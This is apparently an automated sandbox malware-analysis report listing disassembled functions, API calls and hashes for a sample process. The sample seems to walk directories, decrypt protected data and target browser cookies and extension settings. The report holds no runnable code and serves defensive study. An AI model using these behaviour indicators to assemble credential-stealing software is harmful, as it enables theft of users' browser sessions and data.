                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c53031a7d12021abf779eec030edc3cb1edfd715134237106ecb01afa2561957
                                                  • Instruction ID: 19c2682aecc942fbc04bf2dc4297f599028738fde7342e04ecf5cf0a187ae55d
                                                  • Opcode Fuzzy Hash: c53031a7d12021abf779eec030edc3cb1edfd715134237106ecb01afa2561957
                                                  • Instruction Fuzzy Hash: B8E048F1520108FFDF049F50E848B6B37A89764755F00C414FA1D4B151D775D96CCB51

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 231ca0-231caa call 2316e0 234 231cce-231cd0 ExitProcess 231->234 235 231cac-231cb3 call 231e50 231->235 235->234 238 231cb5-231cbc call 233d50 235->238 238->234 241 231cbe-231ccc call 232810 238->241 241->234 244 231cd6-231cd7 241->244
                                                  APIs
                                                  • ExitProcess.KERNEL32 ref: 00231CD0
                                                    • Part of subcall function 00231E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00231CB1,?,00231D86,?), ref: 00231E59
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 611137554-0
                                                  • Opcode ID: 8b71b321e8cc12c001119e1243d2e702237fca19a42440812889663098d502e6
                                                  • Instruction ID: 87678e03f0c8d903e1147144b11796789b04ac6f1635a35a191743bd5b1ca990
                                                  • Opcode Fuzzy Hash: 8b71b321e8cc12c001119e1243d2e702237fca19a42440812889663098d502e6
                                                  • Instruction Fuzzy Hash: D8D067F57A070656EA607FB26E0676A368C5E11785F041832BE08C52A2FA16D9318A73

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 245 231ee0-231eef 246 231ef1-231f04 RtlFreeHeap 245->246 247 231f07-231f0d 245->247 246->247
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(031B0000,00000000,00000000,01430000), ref: 00231EFE
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 2cf3cc23b52fa8cd2bd757d0380f62abec260e279e5c30cbcd595e17b56e8861
                                                  • Instruction ID: d8bb2103fde9492c903d0aa47876a6f1c9539485999a8ad209adcd505936b04c
                                                  • Opcode Fuzzy Hash: 2cf3cc23b52fa8cd2bd757d0380f62abec260e279e5c30cbcd595e17b56e8861
                                                  • Instruction Fuzzy Hash: 6BE017B051420CFBDB14CF98E948BAA7BF8EB08305F104188FA0C87380E771AE50CB91
                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,00231CB1,?,00231D86,?), ref: 00231E59
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CreateHeap
                                                  • String ID:
                                                  • API String ID: 10892065-0
                                                  • Opcode ID: d82cd68404aa0d607e2a3f168770783c54f321fe98235775fc174bda2f956b26
                                                  • Instruction ID: d70c7aa36fd8f3f4c7b528f9280f0ba534aac26646f23e23389ac20a6b0082de
                                                  • Opcode Fuzzy Hash: d82cd68404aa0d607e2a3f168770783c54f321fe98235775fc174bda2f956b26
                                                  • Instruction Fuzzy Hash: 3AD01274674308EBF7215F60BC4DB113694A708755F100421FF4D891E0E3F2A4A04614
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 23054232c5878453c3dd4aeeb02b605cdc47899deb8cd995aecbb1bd938d8b47
                                                  • Instruction ID: 7da24b1a533e1952c20b79e57a53523393917dcf0717824990db4c6d9a264b96
                                                  • Opcode Fuzzy Hash: 23054232c5878453c3dd4aeeb02b605cdc47899deb8cd995aecbb1bd938d8b47
                                                  • Instruction Fuzzy Hash: 75C04C75160208ABDA059F94FD59E6A3B9CA749600F404408B74D4A150DB61E8008750
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 00232E41
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 70aea8c058923b7b33455541fe092385944727e96385bef4663b7afafe0a8afa
                                                  • Instruction ID: 1016e5fbbe6e9411f4b002d43fef9f4a4f0536942812dfc8a9a384b7d478c409
                                                  • Opcode Fuzzy Hash: 70aea8c058923b7b33455541fe092385944727e96385bef4663b7afafe0a8afa
                                                  • Instruction Fuzzy Hash: BA116AB8A20218E7CB04CF44D550AB9B7B5FF58301F208198F9068B381E735DEA5E7A0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00232AF6
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: f9def1d309bbe82c4a2193db2e465c815e69be1378763dd1f2cbf69eb37bced3
                                                  • Instruction ID: 6228ac7953b012ceb56148db10179e80ee40a05857c033533a499ae552ce37e6
                                                  • Opcode Fuzzy Hash: f9def1d309bbe82c4a2193db2e465c815e69be1378763dd1f2cbf69eb37bced3
                                                  • Instruction Fuzzy Hash: 2A119EB4824329E7CB24DF94D5417BC77B2BF14701F6040A9E9422A681E7B95FA4E391
                                                  APIs
                                                    • Part of subcall function 00231EA0: RtlAllocateHeap.NTDLL(031B0000,00000008,00233D82), ref: 00231EB0
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00238D83
                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00238EB1
                                                  • FindClose.KERNEL32(000000FF), ref: 00238EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Find$File$AllocateCloseFirstHeapNext
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 2963102669-2848263008
                                                  • Opcode ID: 594a852e05b9544dfcfcaed71b4e0483e52a5a8bc4401e73bb2207f642f0024e
                                                  • Instruction ID: 2a2521a6f1033993abfa7b6cc5fed754a6b9766f8d6af91550463342cca9a59f
                                                  • Opcode Fuzzy Hash: 594a852e05b9544dfcfcaed71b4e0483e52a5a8bc4401e73bb2207f642f0024e
                                                  • Instruction Fuzzy Hash: 1941D1F5D10219EBCB14DFA4DD99AAF77B5AF48300F1085A8F9159B281EB349B20DB50
                                                  APIs
                                                  • NtQueryObject.NTDLL(00231593,00000001,?,00000000,00000000), ref: 0023166E
                                                  • NtQueryObject.NTDLL(00231593,00000001,?,00000000,00000000), ref: 00231689
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: ObjectQuery
                                                  • String ID: \Local Extensions Settings\$\Network\Cookies$p+v
                                                  • API String ID: 2748340528-202866110
                                                  • Opcode ID: 08ed9c31da21543be8fa588706bb9e5b53749b59c1f9c44541943a019186a925
                                                  • Instruction ID: f0411b2592cd46858cf99bf76420a93c6d3ce81097f2ba28690a394c4d22592c
                                                  • Opcode Fuzzy Hash: 08ed9c31da21543be8fa588706bb9e5b53749b59c1f9c44541943a019186a925
                                                  • Instruction Fuzzy Hash: DE2196B5A20208BBD704CF91DD42FDE737DAB48705F004096B948D7181E6B1EAE8CF90
                                                  APIs
                                                  • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C53
                                                  • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C63
                                                  • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,002316EB,?,00231CA8,?,00231D86,?), ref: 00231C6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                                                  • String ID: `Iu
                                                  • API String ID: 3068283267-3215586153
                                                  • Opcode ID: be7f0e9e3dcd6efa176d59efe705db032ba30c2194381249a6535687e38efbea
                                                  • Instruction ID: fabd89cac5c1c8bcec1e5e6a7c5858c46acc1444068e2f72543b203f715616c3
                                                  • Opcode Fuzzy Hash: be7f0e9e3dcd6efa176d59efe705db032ba30c2194381249a6535687e38efbea
                                                  • Instruction Fuzzy Hash: 69C04C712D830566E6542BF47E0FB153658AB15B07F444465F34E980D19DE254204567
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?2#$?2#
                                                  • API String ID: 0-1139033712
                                                  • Opcode ID: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                                                  • Instruction ID: 374077dcb2401017ee99a8e30b794b4fb956143054fb923c0d5ae5b5b9e1cdc1
                                                  • Opcode Fuzzy Hash: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                                                  • Instruction Fuzzy Hash: 9E312CF0D1030AEFDB14CF98D941BAEBBB5EF04314F20C46EEA49A7241D774AA509B95
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00231033
                                                    • Part of subcall function 002332A0: LocalFree.KERNEL32(?), ref: 002333BA
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CryptDataFreeLocalUnprotect
                                                  • String ID:
                                                  • API String ID: 1561624719-0
                                                  • Opcode ID: 6cde409cba50c0a041d2ca50a75ea479b127e6fb36b181a3fc1ae0812ec22520
                                                  • Instruction ID: 3ce8a03552fac655104c648c42965c0734bfe15ec5b6fe51475d9bd70c3d8e7d
                                                  • Opcode Fuzzy Hash: 6cde409cba50c0a041d2ca50a75ea479b127e6fb36b181a3fc1ae0812ec22520
                                                  • Instruction Fuzzy Hash: D3F01CB691010CAFDB05DFA8D885EFE77BCEB44310F04856AED198B241EA31DB54CB90
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                  • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                  • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.2541467244.0000000000231000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00230000, based on PE: true
                                                  • Associated: 00000014.00000002.2541444789.0000000000230000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541483923.000000000023A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541499180.000000000023B000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                  • Associated: 00000014.00000002.2541513742.000000000023C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_230000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Cnd_initstd::_
                                                  • String ID: O#$O#
                                                  • API String ID: 1955959516-2094851242
                                                  • Opcode ID: e592f80eb1f9b1b0632711381b7c9192815816f0197bdafb6a5fda9c8fc484cf
                                                  • Instruction ID: a2375839e25bd232f95fba3b61787aecc2062fd4691a79aead40d2a40a23f0f0
                                                  • Opcode Fuzzy Hash: e592f80eb1f9b1b0632711381b7c9192815816f0197bdafb6a5fda9c8fc484cf
                                                  • Instruction Fuzzy Hash: 6BC127F492421ADBCF14DF98C691ABEB7B2FF58700F204169E805AB704E7349E61DB91